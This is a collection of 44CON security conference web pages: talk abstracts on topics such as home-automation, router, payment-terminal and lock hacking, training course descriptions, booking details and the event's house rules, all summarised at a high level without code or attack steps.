          The conference scene is actually a reasonable proxy for the state of information security as a discipline, i.e. there’s a lot of activity but with questionable results (and dodgy metrics).

          This talk aims to change (some of) that.


          Surviving the 0-day – Reducing the Window of Exposure

          Presented By: Andreas Lindh

          According to the NIST National Vulnerability Database, 1772 software vulnerabilities with a CVSS score of 7 or higher were disclosed in 2012, and 2013 is so far (at the time of writing) not looking any better.

          A lot of times the window of exposure – from when a vulnerability is discovered to when a patch has been deployed – is very long. In a corporate environment, it’s not unusual to rely solely on patch management and semi-static security tools such as firewalls, IPS and antivirus for protection, and because of various reasons patch deployment might take a long time or may not even be possible.

          This talk will discuss why patch management is insufficient for protection against new vulnerabilities, how the traditional “defense in depth” model needs to be re-architected, and finally how the window of exposure can be reduced by active response before incidents occur.


          Evading Identification and Detection by Messing with Binary Formats

          Presented By: Ange Albertini

          Malware and exploits rely on many different file formats. It’s critical for security software to accurately identify and parse them, and ideally tell if they are corrupted, clean or malicious. Some formats can sadly be combined, making it possible to create files that evade filtering or detection. Moreover, the gap between the documentation and the possible implementations leaves room for valid files to entirely evade detection.


          Honey I’m Home!! – Hacking Z-Wave Home Automation Systems.

          Presented By: Behrang Fouladi & Sahand Ghanoun

          “Smart homes” employing a variety of home automation systems are becoming increasingly common. Heating, ventilation, security and entertainment systems are centrally controlled with a mixture of wired and wireless networking. In 2011 the UK market for home automation products was estimated at £65 million, an increase of 12% on the previous year, with the US market exceeding $3 billion. Zigbee and Z-Wave wireless protocols underpin most home automation systems. Z-Wave is growing in popularity as it does not conflict with existing 2.4GHz wifi and Bluetooth systems. Our talk describes the Z-Wave protocol and a number of weaknesses, including how to build a low-cost attack kit to perform packet capture and injection, along with potential attacks on the AES crypto implementation.


          Reverse Engineering with HackRF

          Presented By: Michael Ossmann

          Software Defined Radio (SDR) has given us an unprecedented ability to perform over-the-air reverse engineering of proprietary digital radio systems. This entire presentation is one long demonstration, a case study in SDR reversing. I’ll show how I use HackRF to perform radio protocol security analysis without any prior knowledge of the target system required.


          Breaking Bad Programs

          Presented By: Don A. Bailey

          Offensive tactics against executable code have traditionally been measured in repeatable predictable steps. This is suitable for an attack against a single process, thread, or kernel function path. As exploitation evolves, so must our methodologies. Today’s offensive tactics are getting more robust. However, we are seeing very few attacks against moving targets in computer systems. In this presentation, the speaker intends to demonstrate the technical strategies for building attacks based on causality; or, the ability for one action to affect one or more known or unknown objects. Also, I may prank call Bryan Cranston just to be a dick.


          A Fast Hard Disk with Active Antiforensics

          Presented By: Travis Goodspeed

          When a computer reads from a hard disk, it is actually speaking over the bus to a program that runs inside of that disk’s CPU. In this presentation, I will demonstrate a practical antiforensics hard disk that is fast enough to boot from and to work from. While the disk functions normally for a legitimate user, it will erase itself in response to any attempt to image the disk with DD(1) or similar disk imaging tools. To be fair to both attackers and defenders, this presentation will also demo expected vulnerabilities that can be exploited to allow for complete imaging.


          Punking Punkbuster

          Presented By: Isaac Dawson

          This presentation will cover the methods and process used while trying to understand how PunkBuster works. From writing custom tools, to coming up with novel ways of overcoming many obstacles, this personal project has been an enlightening journey. I will cover the various components, how they interact, their anti-debugging and analysis tricks and will give the attendees a greater understanding of how this anti-cheating service was implemented. I will cover how and why I have taken the paths I did, as that is far more important than any code or disassembly listing.


          Security Lessons from Dictators

          Presented By: Jerry Gamblin

          What do the Grand Ayatollah Seyyed Ali Hosseini Khamenei, Kim Jong-un, Julius Caesar, Abraham Lincoln, Napoleon Bonaparte and Adolf Hitler have to do with network security? Come and discover the mistakes these dictators made and what they can teach us about network security and how to apply them to our companies and coworkers.


          .Net Havoc – Manipulating Properties of Dormant Server Side Web Controls

          Presented By: Shay Chen

          Most modern web application frameworks use Server-Side Web Controls to enhance the development process; components that other platforms require the developer to implement can be dragged and dropped into the page design view.

          These components are also protected using a variety of mechanisms, including digital signatures, content restrictions and even invisibility.

          However, developers that use these components improperly can expose their application to a variety of different attacks that can be executed despite, and sometimes due to the existence of security mechanisms.


          The Forger’s Art: Exploiting XML Digital Signature Implementations

          Presented By: James Forshaw

          Many security critical systems rely on the correct implementation of the XML Digital Signature standard for the purposes of verification and identity management. Technologies such as SAML and Web Service Security use the standard, and its sibling XML Encryption, to manage the security of these technologies. Being a standard there is, unsurprisingly, no canonical implementation for any platform or language; with so many different developments there are likely to be differences in how the standard is interpreted.

          This presentation is about research done against the main open and closed source implementations of XML Digital Signatures, and how they can be exploited to gain remote code execution, signature verification bypass or denial of service. It will show some of the more nasty vulnerabilities found during the research including a novel attack against the built-in Java and .NET libraries which allow for trivial signature spoofing, exposing any user of those implementations to accepting an invalid signature which is independent of their usage.


          A Captive Audience

          Presented By: Jaime Cochran

          In modern societies we perceive prisons and jails as places where well deserving citizens endlessly ponder the wrongs they’ve enacted. But, as we all readily admit, history tells us a far different story about prisons. In this lecture, the presenter will discuss the effects of imprisonment in the technological age. Technology can be used to pin down the weak and ensnare alternative voices. Electrically controlled gates, video cameras, biometrics, and other technologies can enforce confinement to a seemingly rigid pace. But, what if technology can be used to flip the scales in the favor of the condemned? We intend to discuss technologies to help inmates communicate with the outside, empowering voices from within the World’s darkest dictatorships. High speed light communication, clever phone tricks, and even astonishing every day objects can be subverted for use in confinement scenarios. The take away from this talk? No matter how you feel pinned down in life, there is always a weakness waiting to be exploited for the benefit of your voice. Let freedom ring!


          Persistent, Stealthy, Remote-controlled Dedicated Hardware Malware

          Presented By: Patrick Stewin

          In this work we present a stealthy malware that exploits dedicated hardware on the target system and remains persistent across boot cycles. The malware is capable of gathering valuable information such as passwords. Because the infected hardware can perform arbitrary main memory accesses, the malware can modify kernel data structures and escalate privileges of processes executed on the system.

          The malware itself is a DMA malware implementation referred to as DAGGER. DAGGER exploits Intel’s Manageability Engine (ME), that executes firmware code such as Intel’s Active Management Technology (iAMT), as well as its OOB network channel. We have recently improved DAGGER’s capabilities to include support for 64-bit operating systems and a stealthy update mechanism to download new attack code.


          I miss LSD

          Presented By: Tim Brown

          A wise man once said (paraphrased) “if you want to find UNIX bugs, compare and contrast the Linux and Solaris man pages”. Following on from my previous work on linker bugs and more recently AIX (at 44CON 2012), we’ll look at some of the more interesting areas of the POSIX specification, focusing on the various IPC mechanisms that can be found in modern POSIX alike OS as well as kernel land more generally. I’ll present some new tools I’ve written to aid in this analysis along with some discussion around how I uncovered potentially exploitable bugs in ~400 Debian GNU/Linux packages in a single day.


          Building Antibodies – The Phishing program at Twitter.

          Presented By: Dan Tentler

          I run the internal phishing program at Twitter. It was built from scratch and uses open source tools. It’s custom tailored to our organization. This talk will describe the objective of running an internal phishing program at your organization, what to track, how to measure, and how to grow the program. This is not an awareness program, this program is designed to imbue antibodies into the culture that will promote the growth of a security culture and help make people more security aware overall. Since the instantiation of this program at Twitter we have seen dramatic changes that make the whole organization safer. There are some configurations an org can employ to dramatically decrease the influx of spam and phishing mails on top of a program such as this. If more orgs had a program like this, phishing would start to become much harder to do. The measurements that come from this program allow us to have a much better view of the risks attached to phishing as well, so we have a tangible, measurable result we can work with. You want to be the guy who designs attack models for your company, then lobs them at employees? This is how to do it.


          Best Practices and the Future of Adaptive Authentication

          Presented By: Robert Weiss & Ben Gatti

          The talk is a deep-dive into the details of authentication focused on best practices and future technologies.


          Even More Tamagotchis Were Harmed in the Making of this Presentation

          Presented By: Natalie Silvanovich

          You might remember Tamagotchi virtual pets from the 1990s. These toys are still around and just as demanding as ever! This talk covers my latest efforts at hacking Tamagotchis. First, I will detail methods for executing code on and dumping code from a Tamagotchi, and then delve into the deep secrets of Tamagotchi life that only code can tell. Finally, I will describe the internals of the Tamagotchi’s GeneralPlus microcontroller and demonstrate some projects that can be built using a modified Tamagotchi.


          My quest into FM-RDS

          Presented By: Oona Räisänen

          This talk will concentrate on my experiences with FM-RDS (Radio Data System), a digital subcarrier embedded in FM broadcast transmissions, and also cryptanalysis of traffic messages contained therein.

          I originally found out about the existence of such transmissions in a roundabout way, by using a spectrum analyzer program to examine intermodulation distortion in my radio’s Line Out audio. As it turned out, the inaudibly quiet distortion, probably caused by the radio’s stereo demuxer circuitry, contained all the information needed to decode all RDS data present in the transmission. I will demonstrate the journey I took and give a short introduction to how the data is actually encoded. Live acquisition of local RDS data depending on signal conditions in the premises.


          Reversing and Exploiting BT CPE Devices

          Presented By: Zachary Cutlip

          In this talk I’ll describe the process by which I reverse engineered the firmware for the BT HomeHub 3.0b and developed a remote exploit that yields root access. The BT HomeHub 3.0b was fairly challenging to reverse engineer and exploit compared to many SOHO routers on the market today. The talk will describe several strategies I pursued in search of an exploitable 0-day. Although some strategies were fruitful and some not, all were instructive.

          Live demos and root prompts are the funnest part of any good security talk, and this one will not disappoint. I’ll demonstrate the exploit and pop root on a HomeHub 3.0b in front of the live audience. Then I’ll demonstrate how to upload tools to the device for instrumentation and attack. If all goes well, I’ll up the ante by attempting a parlor trick made possible by the technical nature of this specific exploit.


          Signatureless Breach Detection Under The Microscope

          Presented By: Olli-Pekka Niemi & Antti Levomäki

          Signatureless attack detection is becoming the hot topic in threat prevention. Client side security vulnerabilities are often found in zero day exploits in the wild, meaning that signature based intrusion detection and prevention systems are not likely to catch these attacks. Signatureless detection systems are designed to detect these kinds of attacks and they do provide some additional layer of security. One of the techniques deployed by signatureless systems is called sandboxing. In sandboxing, the signatureless attack detection system executes files that are being transferred in networks in a sandbox. It carefully instruments the execution and based on that determines if the file was malicious. We have analyzed signatureless detection and particularly the sandboxing technique, and we have found several issues in the concept. We have also found ways to completely evade sandboxing. We have taken some peeks into one of the market leading sandboxing products and will disclose our findings. In this presentation we will discuss the problems we have identified in signatureless attack detection and sandboxing, and disclose our findings regarding one of the market leading products. The attendees will better understand the limits of these systems. Even though they will provide an additional layer of security, there are issues one should know.


          Browser bug hunting – Memoirs of a last man standing

          Presented By: Atte Kettunen

          Just like drinking is not a game in Finland; neither is browser bug hunting – it’s serious business! Browser bugs have been supporting Atte Kettunen’s (@attekett) traditional Finnish way of living since late 2011 and he’s going to tell you all about how he has been living the dream browser bug hunting – focusing on one of the most secure browsers around, Google Chrome!

          He’ll tell you a tale of his experiences with bounty programs and how those have evolved since he started way back (vendors can show the love too!) and how he’s managed to survive in the harsh environment of browser bug hunting. He’ll impart some important bug hunting social skills by showing you how and how NOT to step on the other guys’ toes – very competitive cottage industry is browser bug hunting. 😉

          Atte is also going to share with you how and why he selected his current target feature (still full of bugs!), how he built his fuzzer-module(s) and the results produced. We’ll all walk a mile in a bug hunter’s shoes together and take a peek at the tool sets, as well as the infrastructures that are used to find browser bugs by individuals and vendors!


          Hack the Gibson – Exploiting Supercomputers

          Presented By: John Fitzpatrick & Luke Jennings

          We have had the luxury of conducting security research and penetration testing activities on a few Supercomputers on the world top 500 list. Having spent some time assessing the security of these awesome machines it’s fair to say that many of the technologies involved have been largely untouched by public security scrutiny and consequently the security bar is much lower than we have come to expect in 2013. This presentation will cover our research and demonstrate some of the most interesting and significant vulnerabilities we have uncovered so far. We will also be demonstrating 0-day exploits and previously undocumented attack techniques live so you can see how to get root on 20,000 nodes all at once. There are many ways to hack the Gibson and today you’ll learn some.


          44CON 2017

          44CON 2017 will take place on 13th to 15th of September 2016 at the ILEC Conference Centre. It will kick off on Wednesday 13th September at 6:30pm with our Community Evening. Registration will start at 6pm.

          Entry is free on Wednesday evening but you will have to register beforehand.

          Early Bird Tickets for 44CON 2017 went very quickly. Standard tickets are available in our shop.

          Accommodation:

          Like we did last year, we are giving you the option to book a hotel room at the same time as your ticket, for 2 nights (Wednesday and Thursday) or 3 nights (Tuesday to Thursday or Wednesday to Friday, please specify at checkout), including breakfast and WiFi, for:

          • £110 per night for a single room (inc VAT)
          • £120 per night for a double or twin room (inc VAT)

          You can also book rooms at the same price directly with the IBIS by emailing h5623-re8@accor.com or calling +44 (0) 207 666 8551 and quoting the following code: 44CON17-ATT. There is a limited number of rooms available and the code will expire one month before the event so book early to avoid disappointment.

          44CON CYBER SECURITY 2015 Workshops

          Breaking In: How to hack your way to a Cybersecurity career, and how to hack it if you already have one

          Presented By: Steve Lord

          Many people on the red side of the information security fence look at systems all the time and break them. When you walk into a room you’re checking for exits and CCTV cameras. When you get a router or a new digibox from your ISP, you’re sat there wondering what else it does and whether or not you want it on your network. We apply our mindset to most things except people, including ourselves because we’re trained to hack systems.

          People are a system. You are a system. Your career is a system.

          Whether you’re starting out or a seasoned pro, you can apply the principles of hacking to your career to raise your career profile, influence the things that matter to you and make better career judgements. From pay rises to CVs, from job applications to interviews. Everything’s open to be hacked, so let’s hack it!

          Based on content from Steve’s 30 day e-mail course on how to hack your career and his upcoming book, Breaking In: The Pentester’s Hidden Handbook, this workshop will teach you the basics of hacking your career.

          In this workshop you will learn how to:

          • Hack your CV
          • Build a targeted profile for the job you want
          • Use OSINT to find the right certs and experiences
          • Manage recruiters
          • Hack a phone interview
          • Hack a face-to-face interview

          Over 700 people have learned how to hack their career on Steve’s free 30-day career hacking by email course at https://rawhex.com/hack-your-career/. Hacking your career can be the difference between an unrewarding job and the career you want. This workshop is being delivered exclusively for the first time at 44CON Cyber Security. If you’re not hacking your career, you’re only stealing from your own potential. Book your 44CON tickets now as this workshop is expected to fill up quickly.


          Essentials of Incident Response (Working Title)

          Presented By: Steve Armstrong

          This workshop aims to cover the three key areas required to build an effective Incident Response capability:

          1. Legal
            • Contracts/NDAs/permission to call in other staff/work off site/take IP data away from the network/site.
            • Noting that EU/US privacy/SEC laws and regulation are in play here (plus IP etc.) – as many IR companies are US based, what do we do about privacy/disclosure/IP protection?
          2. Working with the team
            • What to expect when they are onsite – space/access/briefing needs
            • Getting the basics together: Points of Contact, Network Schematics, OS/App deployment info, Barrier info (AV, FW, SIEM, Logs, N/HIPS, Netflow etc).
            • What to release to who, when and how – secure methods of communicating with the team, sharing files and getting legal’s approval for all this.
            • Getting quotes or ROMs for extras like “We will just send this back to the office for off-site malware analysis”
            • What does a badly controlled engagement look like? Where does the fault lie?
          3. Tech
            • What to configure to improve logging fidelity
            • Various new MS updates for logins exe hashes, File system journalling, prefetch enabling, shadow copy enabling etc.
            • When to call it a day
            • What to do afterwards – making the remediation hold
            • Maintaining the momentum
            • Fixing the problem to prevent the reoccurrence

          Archive

          Over the years we’ve run a lot of 44CON conferences and other events too. If you’re looking for something specific the search engine may be able to help. Here’s a list of what we’ve done over time.

          2019

          2018

          2017

          2016

          2015

          2014

          2013

          2012

          2011

          Our records, like our memories, are hazy. Some talks are up on our YouTube channel.

          A list of all previous speakers can be found here. Thanks to every one of them for speaking at our events.

          44CON 2016 Training

          All training courses are run between the 12th and 14th September 2016 at two etc.venues locations.

          Presented by: Joe FitzPatrick

          This course introduces and explores attacks on several different relatively accessible interfaces on embedded systems. Attendees will get hands-on experience implementing and deploying a number of low-cost hardware devices to enable access, privilege, and deception which is in some cases imperceptible from software. We’ll examine UART, JTAG and SPI interfaces on both ARM and MIPS embedded devices, representative of a wide range of embedded devices that span consumer electronics, medical devices, industrial control hardware, and mobile devices. We will observe, interact with, and exploit each interface to use physical access to enable software privilege.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Saumil Shah

          This year, we bring you a brand new class. The ARM Exploit Laboratory debuts in 2016, bringing you an intense 3 day course featuring a practical hands-on approach to exploit development on ARM based systems.

          Course Length: 3 days (12th-14th September 2016) at etc.venues The Hatton

          Presented by: Dawid Czagan

          This course has been cancelled.

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join this unique hands-on training! Dawid Czagan will discuss security bugs that he has found together with Michal Bentkowski in a number of bug bounty programs (including Google, Yahoo, Mozilla, Twitter and others). You will learn how bug hunters think and how to hunt for security bugs effectively. To be successful in bug hunting, you need to go beyond automated scanners. If you are not afraid of going into detail and doing manual/semi-automated analysis, then this hands-on training is for you.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Dominic Chell, MDSec

          The course follows chapters 1-9 of the Mobile Application Hacker’s Handbook, with a strong focus on practical attacks. Over the 2-day training course delivered by the lead author of the book, delegates will learn the tricks and techniques to hack and secure mobile applications on the iOS and Android platforms.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Jordan Wiens, Peter LaFosse & Rusty Wagner

          This course has been cancelled.

          PwnAdventure is a custom 3D MMORPG created for the Ghost in the Shellcode CTF and it’s now been transformed into a hands-on reverse engineering training class. Learn the basics of binary reverse engineering, custom network protocol analysis, all while granting yourself in-game superpowers and pwning newbs with your FPS skills.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Marcus Pinto, MDSec

          The Web Application Hacker’s Handbook (WAHH) Series is the deepest and most comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Ashfaq Ansari

          This course has been cancelled.

          This training is focused on exploitation of different Windows Kernel Mode vulnerabilities ranging from Pool Overflow to Use after Free. We will cover basics of Windows Kernel Internals and hands-on fuzzing of Windows Kernel Mode drivers. We will dive deep into exploit development of various kernel mode vulnerabilities. We will also look into different vulnerabilities in terms of code and the mitigations applied to fix the respective vulnerabilities.

          Course Length: 3 days (12th-14th September 2016) at etc.venues The Hatton

          Book your 44CON 2016 training course now!

          44CON House Rules

          44CON is welcoming to all. We’ve drafted these house rules to help you understand our guiding behavioural principle: Wheaton’s Law (“Don’t be a dick”). Our house rules aren’t perfect, they’re a work in progress and we’re open to suggestions via houserules@44con.com.

          These rules apply to everyone and all interpersonal interactions at the event.

          Expectations

          What we want you to get from 44CON: Knowledge. New friends. Job Opportunities. Good times.
          What we expect from you: Respect for others. Being kind. Not being a dick.

          Interpreting Wheaton’s Law

          Our crew leads are the arbiters of Wheaton’s Law. Their decision is final. If you’re given an instruction from a crew member, please follow it. If you’re given a warning, please heed it.

          Banter, a playful, friendly exchange of teasing remarks, is fine. If it’s not consensual, it’s not banter.

          Reporting concerns

          1. If you have a concern, please raise it with the clearly visible crew or at the front desk.
          2. Alternatively, please fill in a feedback form, anonymously if you prefer.
          3. If the above isn’t possible, please email houserules@44con.com with your concern.
          4. Everything is handled in confidence and we can provide space and support where needed.

          We welcome anonymous feedback, but it affects our ability to communicate outcomes.

          Grounds for removal

          We reserve the right to remove anyone from the event without reimbursement for, but not limited to, the following behaviours:

          1. Theft.
          2. Sustained harassment, discrimination or disruption.
          3. Acts of violence.
          4. Criminal activity.
          5. Any other reason where the relevant crew lead believes that your continued presence may cause a risk to the safety of yourself, others or where Wheaton’s Law has been breached to such a degree that you have acted an epic dick.

          Please note: Laws at home may not match those here. In particular, free speech isn’t protected, our computer crime laws are ridiculous and both harassment and discrimination are criminal offences.

          44CON 2018 Talks

          For a full list of 44CON 2018’s confirmed speakers, please click here.

          They’re All Scorpions – Successful SecOps in a Hostile Workplace

          Presented by: Pete Herzog

          Your job is to secure operations. But nobody listens to you. There’s no budget. Management keeps making bad security decisions that seem to sabotage your efforts. Do you flee or do you try harder? The security books, blogs, and tweeting pundits out there tell us we need to learn the language of business. We need to put risk in terms of money that management understands. We need to be like the management we’re trying to protect. And that’s where it all falls apart. The security to business relationship is often textbook abusive codependency. You do well and nobody notices. You fail and you get fired or worse – shamed by your peers over social media for whatever the company releases as the statement for the breach. So how do you do SecOps under those conditions? This talk will focus on new ways to approach SecOps to face the challenges you have today with business demands. We will look at new security research that will make a difference for how you do your job. Most of all we will show you technical security practices to help you sustain your newfound stance.

          The UK’s Code of Practice for Security in Consumer IoT Products and Services

          Presented by: David Rogers

          In March 2018, the UK launched its Secure by Design report in order to help defend against security threats, especially for consumer Internet of Things products and services. Over the past few years, poorly secured IoT devices have been hijacked in both targeted as well as large-scale DDoS attacks such as Mirai. In addition to this, poor security can threaten both privacy and safety.

          The speaker, David Rogers, authored the UK’s ‘Code of Practice for Security in Consumer IoT Products and Associated Services’, in collaboration with DCMS, NCSC, ICO and industry colleagues with extensive support from the security research community. David will discuss the guidelines within the Code of Practice, why these were prioritised and why the top three became dealing with the password problem, implementing vulnerability disclosure and acting on it and addressing software updates. David will also look at what’s next: what will the challenges be and will the Code of Practice succeed in its aims? How can IoT products possibly be certified and how will the threat landscape change in response to improving security?

          Weak analogies make poor realities – are we sitting on a Security Debt Crisis?

          Presented by: Charl van der Walt

          Cyber Security is often framed in terms of ‘Risk’- the possibility of suffering harm or loss – and the ‘Management’ of Risk to reduce uncertainty. This is familiar territory for businesses. Cyber Security falls in neatly under Risk Management, is assigned a suitable place on the organigramme, tossed some spare budget and granted a few paragraphs in the board report. NIST defines Risk as a ‘function of the likelihood of a given threat-source’s exercising a particular potential vulnerability, and the resulting impact of that adverse event on the organisation’.

          Key theme:
          This presentation explores the idea that making cyber security analogous to risk is holding us back. How about we talk about security ‘debt’ instead? Technical Debt is already a well understood concept in software development – the cost of additional rework caused by choosing an easy solution now instead of using a better approach that would take longer or cost more. Changing our language changes how we think and how we behave. This presentation argues that such a change could have a significant impact on software security.

          In this presentation we will comment on the power of ‘analogies’ and how they’ve shaped our industry. We’ll then consider the difference between the ‘security as risk’ and the ‘security as debt’ paradigms and explore how changing paradigms may change the way we think about, talk about and measure software security. We believe this could have a very empowering effect on development managers and other security professionals who are struggling to articulate the relative benefits of security (or a lack of security) to a software product.

          Catch Me If You Can: Ephemeral Vulnerabilities in Bug Bounties

          Presented by: Shubham Shah and Michael Gianarakis

          The internet is changing, at a much faster pace today with cloud computing being so easily accessible. As the attack surface of the internet (IPv4) changes there are periods of time where vulnerabilities are present but dissipate quickly.

          By being able to monitor an organisation and effectively determine these changes, we’ve found a number of critical vulnerabilities within networks and applications that are only present for a short period of time. This presentation will detail multiple critical vulnerabilities found by participating in bug bounty programs that we classify as ephemeral vulnerabilities, and the details on how we identified and exploited them in the first place.

          For the Love of Money: Finding and exploiting vulnerabilities in mobile point of sales systems

          Presented by: Leigh-Anne Galloway and Tim Yunusov

          These days it’s hard to find a business that doesn’t accept faster payments. Mobile Point of Sales (mPOS) terminals have propelled this growth lowering the barriers for small and micro-sized businesses to accept non-cash payments. Older payment technologies like mag-stripe still account for the largest majority of all in-person transactions. This is complicated further by the introduction of new payment standards such as NFC. As with each new iteration in payment technology, inevitably weaknesses are introduced into this increasingly complex payment eco-system.

          In this talk, we ask, what are the security and fraud implications of removing the economic barriers to accepting card payments; and what are the risks associated with continued reliance on old card standards like mag-stripe? In the past, testing for payment attack vectors has been limited to the scope of individual projects and to those that have permanent access to POS and payment infrastructure. Not anymore!
          In what we believe to be the most comprehensive research conducted in this area, we consider four of the major mPOS providers spread across the US and Europe: Square, SumUp, iZettle and PayPal. We provide live demonstrations of new vulnerabilities that allow you to MitM transactions, send arbitrary code via Bluetooth and mobile application, modify payment values for mag-stripe transactions, and a vulnerability in firmware; DoS to RCE. Using this sampled geographic approach, we are able to show the current attack surface of mPOS and to predict how this will evolve over the coming years.

          New to this talk, we will demonstrate how anyone can carry out an attack to send arbitrary code to an mPOS device using simple hardware costing less than £8. The automation of this process allows an attacker to select from a variety of pre-generated messages to send to the mPOS during the transaction process. With this an attacker can tamper with the process to give the appearance that a transaction has been completed when it has not been authorized. Or, a fraudulent merchant could manipulate the process to force a victim to approve multiple transactions.

          Finally, for audience members that are interested in integrating testing practices into their organisation or research practices, we will show you how to use mPOS to identify weaknesses in payment technologies, and how to remain undetected in spite of anti-fraud and security mechanisms.

          Ghost in the Locks – owning electronic locks without leaving a trace

          Presented by: Tomi Tuominen and Timo Hirvonen

          A little over ten years ago, a friend of ours returned to his hotel room to find that his laptop was gone. The door to his room showed no signs of forced entry; there was no record that the electronic lock had been accessed while he was away; and there was certainly no evidence that this electronic lock, deployed on millions of doors in more than 150 countries worldwide, could have been hacked.

          Sometimes hacking boils down to spending more time on something than anyone could reasonably expect. This talk is an ode to that cliché. It is the culmination of a decade-long quest to find out whether the most widely used electronic lock in the world can be bypassed without leaving a trace. And in this adventure, breaking into hotel rooms is only the beginning. But lucky for all of us, unlike most cases of theft from hotel rooms, this story has a happy ending.

          Pwning the 44CON Nerf gun

          Presented by: Chris Wade and Dave Lodge

          Con speakers fear the Nerf gun. Overrun your talk time at your peril; Steve will shoot your arse with extreme prejudice until you STFU. We had to find a way to pwn the gun and shoot him back.

          That’s when we found the Nerf Terrascout: a remote tank gun controlled over 2.4GHz, with a video feed to the remote, complete with crosshairs.

          At first, we thought this would be a trivial job: figure out the RF and take control. It turned into a mammoth hardware, firmware and RF reversing project.

          This puppy is so over-specced it would drive you to tears.

          The talk will cover the fails, hair loss and eventual success. There won’t be any smart dildos in it, though some of the techniques used are equally suited to teledildonics exploitation, if that’s your thing.

          Reversing RF in a high frequency environment using SDRs is challenging. We’ll discuss how we worked around these issues using hardware reversing skills.

          We had to import hardware from China for this project, which we could then programme ourselves using SPI, impersonate the legitimate controller and ‘jack the tank gun.

          This talk will of course include a live demonstration of hijacking the tank gun and (possibly) shooting Steve.

          JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and face recognition – and frankly, everywhere else

          Presented by: Guy Barnhart-Magen and Ezra Caltum

          Exploits, Backdoors, and Hacks: words we do not commonly hear when speaking of Machine Learning (ML). In this talk, I will present the relatively new field of hacking and manipulating machine learning systems and the potential these techniques pose for active offensive research.
          The study of Adversarial ML allows us to leverage the techniques used by these algorithms to find weak points and exploit them in order to achieve:

          • Unexpected consequences (why did it decide this rifle is a banana?)
          • Data leakage (how did they know Joe has diabetes)
          • Memory corruption and other exploitation techniques (boom! RCE)
          • Influence the output

          In other words, while ML is great at identifying and classifying patterns, an attacker can take advantage of this and take control of the system.
          This talk is an extension of research made by many people, including presenters at DefCon, CCC, and others – a live demo will be shown on stage!

          Garbage In, RCE Out 🙂

          Kill All Humans… Bugs! : Machine Learning to the rescue of code review

          Presented by: Philippe Arteau

          Security code reviews with static analysis tools have inherent problems. While many potential vulnerabilities are found quickly, the number of false positives can be overwhelmingly high on large applications (think millions of lines of code). Even with just a few dozen findings, the human fatigue can have a big impact on the triage. Our research addresses these issues by applying machine learning (ML) to automatically triage the output of static analysis tools.

          The objective is to classify vulnerabilities, such as SQL injection or Cross-Site Scripting, using supervised machine learning algorithms. Supervised learning implies that a subset of issues has been classified as false positives or real vulnerabilities. Since algorithms need more than just basic attributes to be efficient, datasets are enriched with various indicators that humans look at when reviewing code. Attributes fall into four categories: location (class names, packages, module), data flow sources (method calls, variables’ flow), API (sink, source) and dynamic expression. This talk uncovers the level of effectiveness of these various attributes with common algorithms (random forest, naive Bayes and tree) and releases “Find Security Bugs ML”, a set of open-source tools that builds enriched datasets and classifies findings using ML algorithms.

          Additionally, demonstrations will be made to cover the tools’ main functionalities. These include large-scale vulnerability scanning while prioritizing issues presented to reviewers and double checking classification made by developers.

          Applying the tool on Java libraries, including the Spring Framework, allowed us to find some interesting 0-day vulnerabilities. Attendees should be able to replicate similar findings on their enterprise applications or third party’s libraries, even when they don’t have the application’s source code due to Java’s bytecode support.

          So You Want to Red Team?

          Presented by: Lawrence Munro and Matt Lorentzen

          So, you want to be a Red Teamer, but you can’t get into it because you’re not a big enough name, or you lack the opportunities and experience to develop the skill-set? It’s extremely hard to develop your red teaming skills without access to legitimate work within this sphere (or legal, at least!). The skills are advanced and require hours spent in enterprise environments honing your tradecraft, but access to this world can be a chicken and the egg situation.

          In this talk, we discuss the skill differences between pen testing and red teaming and how to break into a red team. We approach the topic from both a career / tactical angle as well as how to close the upskilling gap. We introduce a new open source lab (Fortis), which provides a new approach to simulating user interactions (using unique ‘Digital People’) to help you develop the right skillsets without going out-of-scope and staying on the right side of the law.

          Automating myself out of a job – A pentesters guide to left shifting security testing

          Presented by: Jahmel Harris

          Security is big business. Between security companies trying to sell “security-in-a-box” and infosec professionals charging a fortune to tell devs “you’re doing it wrong”, is it any wonder security is an area that is often deprioritised?

          In this talk, we’ll look at what we should be doing to left shift security testing i.e. make it easier to perform security tests during development. By working harder to integrate ourselves into the development process, we can start to see what can and should be automated (and where a security specialist should actually fit in). We’ll look to understand that writing secure applications does not need to be costly and not all applications need to have the same level of security.

          By using actual vulnerabilities found during pen tests as examples, we will look at the tools and techniques we can use to detect vulnerabilities automatically and early in the development lifecycle, ultimately allowing us to release software often and quickly while still having a good understanding of the application’s risk.

          The aim of this talk will be to understand why security has not kept current with modern development practices and give developers the ability to integrate security into the development pipeline.

          Using SmartNICs to Provide Better Data Center Security

          Presented by: Jack Matheson assisted by Ahmad Atamlh

          Data Center security has been forced to reinvent itself as software complexity increases, networking capabilities grow more agile, and attack complexity turns unmanageable. With this change, the need for security policy enforcement to be handled at the edge has pushed functionality onto host compute systems, resulting in inherent performance loss and security weakness due to consolidation of resources.

          In the first part of the talk we will be presenting a SmartNIC-based model for data-center security that solves both the performance problem and the security problems of edge-centric policy models. The model features a more robust isolation of responsibilities, superior offload capabilities, significantly better scaling of policy, and unique visibility opportunities.

          To illustrate this, we present a SmartNIC-based reference architecture for network layout, as well as examples of SmartNIC security controls and their resulting threat models.

          The second part of the talk will unveil a new innovative technique for tamper proof host introspection as SmartNICs are in a unique position to analyze and inspect the memory of the host to which they are attached. Normally, this functionality is reserved for a hypervisor, where it is known as ‘guest introspection’ or ‘virtual-machine introspection’. With host introspection, security controls no longer live in the hypervisor, but on the SmartNIC itself, on a separate trust domain. In this way, the visibility normally achieved with guest introspection can be performed for the entire host memory in an isolated and secure area. In order for host introspection to work in the same way as guest introspection, memory is DMA transferred in bursts over the PCI-e bus that attaches the SmartNIC to the host. As this method can be subverted to hide unwanted software, we will demonstrate a novel approach to tamper proof the acquisition of memory and for performing live introspection.

